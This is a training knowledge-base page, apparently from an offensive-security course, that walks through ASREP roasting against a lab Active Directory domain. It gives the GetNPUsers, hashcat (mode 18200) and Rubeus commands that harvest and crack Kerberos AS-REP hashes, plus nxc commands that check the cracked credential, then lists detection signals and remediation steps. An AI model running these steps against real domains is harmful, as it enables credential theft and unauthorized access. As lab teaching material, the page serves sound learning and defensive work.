Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access / Techniques

ASREP Roasting

ASREP roasting requests crackable Kerberos material for accounts that do not require preauthentication.

This belongs in initial access because it can work without a valid password.


Why It Works

Normal Kerberos authentication requires the client to prove knowledge of the password before the KDC returns useful encrypted material.

If an account has Do not require Kerberos preauthentication enabled, the KDC can return an AS-REP directly. Part of that response is encrypted with the user's password-derived key, so we can crack it offline.


Enumerate With GetNPUsers

Prepare users:

cat > users.txt <<'EOF'
alice.wright
ben.carter
svc_legacy
svc_sql
svc_web
EOF

Request AS-REP hashes:

GetNPUsers.py ootw.local/ -usersfile users.txt -dc-ip 10.10.10.200 -no-pass -format hashcat -outputfile asrep.hashes

Expected OOTW vulnerable account:

svc_legacy

Crack

Hashcat mode:

18200

Crack:

hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show

Controlled OOTW wordlist:

printf 'Legacy2026!\nStudentPass2026!\nHelpdesk2026!\n' > ootw-small.txt
hashcat -m 18200 asrep.hashes ootw-small.txt
hashcat -m 18200 asrep.hashes ootw-small.txt --show

Validate

nxc smb 10.10.10.200 -d ootw.local -u svc_legacy -p 'Legacy2026!'
nxc ldap 10.10.10.200 -d ootw.local -u svc_legacy -p 'Legacy2026!'

Success:

[+] ootw.local\svc_legacy:Legacy2026!

Windows Option

From a domain-joined Windows host:

.\Rubeus.exe asreproast /user:svc_legacy /format:hashcat /nowrap

All visible vulnerable users:

.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Detection

Defenders look for:

  • Security 4768 where preauthentication type is 0
  • bursts of AS-REQ traffic across many users
  • Rubeus or Impacket execution
  • successful logons after ASREP collection
  • accounts configured with preauthentication disabled

Remediation

  • disable Do not require Kerberos preauthentication
  • enforce strong passwords on service accounts
  • rotate exposed service account passwords
  • monitor 4768 events for preauth-disabled accounts
  • avoid using normal user accounts as long-lived services